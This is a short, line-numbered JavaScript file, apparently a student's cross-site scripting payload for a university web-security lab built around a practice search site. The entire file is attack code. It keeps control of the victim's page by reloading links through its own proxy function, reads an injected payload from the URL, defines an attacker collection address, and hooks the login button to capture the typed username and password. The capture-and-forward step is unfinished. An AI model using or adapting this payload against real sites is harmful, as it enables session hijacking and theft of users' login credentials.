function proxy(href) { $("html").load(href, function(){ $("html").show();

1. function proxy(href) {
2. $("html").load(href, function(){
3. $("html").show();
4. var xssdefense = 0;
5. var attacker = "http://127.0.0.1:31337/stolen";
6. var payload = window.location.search.substr(1).split("&")[1].split("=")[1];
7.  
8. var url = "./search?xssdefense=" + xssdefense.toString() + "&q=" + payload;
9. alert(url);
10.  
11. $("#query").val("pwned!");
12.  
13.  
14. $("#bungle-lnk, #search-again-btn").click(function(e) {
15. log("clicked home");
16. e.preventDefault();
17. proxy("./");
18. });
19.  
20. $("#search-btn").click(function(e) {
21. log("clicked search-btn");
22. e.preventDefault();
23. proxy("./search");
24. });
25.  
26. $(".history-item").click(function(e) {
27. var href = $(this).attr("href");
28. log("clicked history item");
29. e.preventDefault();
30. proxy(href);
31. });
32.  
33. $("#log-in-btn").click(function(e) {
34. e.preventDefault();
35. log("clicked login");
36.  
37. var username = $("#username").val();
38. var userpass = $("#userpass").val();
39.  
40. alert(username);
41.  
42. $.ajax({
43. type: "POST",
44. url: "http://trurl.cs.illinois.edu/login",
45. dataType: "text",
46. data: {
47. username: username,
48. password: userpass
49. },
50. success: function(){
51. alert("successful login");
52. }
53. });
54.  
55. proxy("./login");
56. });
57. });
58. }